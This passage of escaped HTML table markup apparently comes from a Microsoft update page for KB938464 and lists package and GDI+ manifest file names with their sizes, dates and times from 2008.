class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,188</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb938464_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,254</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_6_for_kb938464~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,523</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_0_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,424</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_0~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,443</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_1_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_1~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,385</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,701</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_client~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,732</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_0_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,420</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_0~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,421</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_sc~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_0_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,423</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_0~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,443</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,429</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_server~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,448</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_0_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,420</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_0~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,439</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,428</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpesrv~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,447</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpe_0_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,418</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpe_0~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,437</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpe_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,422</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpe~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,441</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,519</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6000.16683_none_9ea0f08ac96e2537.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6000.20826_none_87cd0392e31b3a67.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.18065_none_9e7abe2ec9c13222.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">11:26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.22170_none_87ae89a0e3672b5a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6000.16683_none_8df25f6f6273fede.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:00</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File 